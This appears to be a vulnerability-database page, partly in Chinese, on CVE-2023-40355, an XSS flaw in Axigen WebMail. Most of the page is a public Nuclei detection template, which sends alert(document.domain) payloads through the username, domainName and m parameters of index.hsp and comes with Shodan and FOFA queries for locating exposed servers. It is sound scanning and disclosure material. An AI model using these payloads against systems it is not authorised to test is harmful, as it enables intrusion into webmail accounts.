CVE-2023-40355: Axigen WebMail - Cross-Site Scripting

日期: 2025-08-01 | 影响软件: Axigen WebMail | POC: 已公开

漏洞描述

Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.

PoC代码[已公开]

id: CVE-2023-40355

info:
  name: Axigen WebMail - Cross-Site Scripting
  author: amir-h-fallahi
  severity: medium
  description: |
    Cross Site Scripting (XSS) vulnerability in Axigen versions 10.3.3.0 before 10.3.3.59, 10.4.0 before 10.4.19, and 10.5.0 before 10.5.5, allows authenticated attackers to execute arbitrary code and obtain sensitive information via the logic for switching between the Standard and Ajax versions.
  reference:
    - https://www.axigen.com/knowledgebase/Axigen-WebMail-XSS-Vulnerability-CVE-2023-40355-_396.html
    - https://nvd.nist.gov/vuln/detail/CVE-2023-40355
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 5.4
    cve-id: CVE-2023-40355
    cwe-id: CWE-79
    epss-score: 0.26672
    epss-percentile: 0.96174
    cpe: cpe:2.3:a:axigen:axigen_mobile_webmail:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: axigen
    product: axigen_mobile_webmail
    shodan-query: http.favicon.hash:-1247684400
    fofa-query: icon_hash=-1247684400
  tags: cve,cve2023,xss,axigen,webmail

http:
  - method: GET
    path:
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&username=\\'-alert(document.domain),//"
      - "{{BaseURL}}/index.hsp?passwordExpired=yes&domainName=\\'-alert(document.domain),//"
      - "{{BaseURL}}/index.hsp?m=',alert(document.domain),'"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "\\\\'-alert(document.domain),//"
          - "',alert(document.domain),'"
        condition: or

      - type: dsl
        dsl:
          - 'contains(header, "text/html")'
          - 'contains(response, "Axigen")'
          - 'status_code == 200'
        condition: and
# digest: 4a0a00473045022039a48c2ad5baed97aa50a865673ad57d6d9e3a8eb3e1fb79b79d0a987284a3b0022100d9aeee411495bc30f2b346e045a266c21440ba8c77eeac2530ac991208b9a55d:922c64590222798bb761d5b6d8e72950

相关漏洞推荐